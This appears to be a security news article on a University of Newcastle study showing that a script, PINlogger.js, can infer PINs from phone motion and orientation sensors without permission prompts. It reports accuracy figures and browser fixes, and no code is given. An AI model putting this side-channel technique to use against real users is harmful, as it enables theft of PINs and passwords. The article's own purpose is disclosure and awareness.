This novel attack technique was discovered and explored by a team of scientists from the University of Newcastle in the UK, who say the script can collect data from around 25 sensors, which together, allow an attacker to infer what the user types on his device.
Not all sensors are restricted by OS permissions
The attack is successful because mobile operating systems do not restrict applications, such as browsers, from accessing all these sensors.
The current built-in permissions model asks users to grant an app access to sensors such as GPS, camera, or microphone, but not to data from the phone’s accelerometer, gyroscope, proximity, NFC, and rotation sensors.
Due to lowering costs, these sensors are now becoming a common feature in modern smartphones, but mobile operating systems are lagging behind.
If the user allows the browser or a tainted app to run in the background of his phone, while using another app, the PINlogger.js script will continue to collect sensor data. If at any point the user enters PINs or passwords, PINlogger.js records the data and sends it to an attacker’s server.
The more sensors the phone is equipped with, the more data the attacker has at his disposal to deduce what the user has typed.
“It’s a bit like doing a jigsaw – the more pieces you put together the easier it is to see the picture,” says Dr. Siamak Shahandashti, a Senior Research Associate in the School of Computing Science and one of the researchers that worked on the study.
Attackers can guess PINs with a high degree of accuracy
Just by listening to motion and orientation sensor streams, which do not require special permissions to access, researchers said that an artificial neural network they’ve trained was able to crack four-digit numerical PINs on the first try with a 74% accuracy based on the data logged from 50 user devices.
The accuracy grew to 86% and 94% when the neural network was allowed a second and third try, respectively. Further, the algorithm coould also be adapted to handle full alpha-numerical characters.
According to researchers, the entire point of their research was to raise awareness to the vast number of smartphone sensors which applications can access, and for which mobile OS vendors haven’t yet included in their standard permissions model.
Some browser vendors have implemented fixes
Similarly, starting with iOS 9.3 (March 2016), Apple implemented a similar restriction for Safari. The issue remains unresolved in Chrome.
In the future, researchers would like to see mitigations solutions at the OS level, rather than applications.
The full research paper was published today in the International Journal of Information Security, and is entitled “Stealing PINs via mobile sensors: actual risk versus user perception.” At the top of this article there is a video of PINlogger.js collecting sensor data from an iOS device.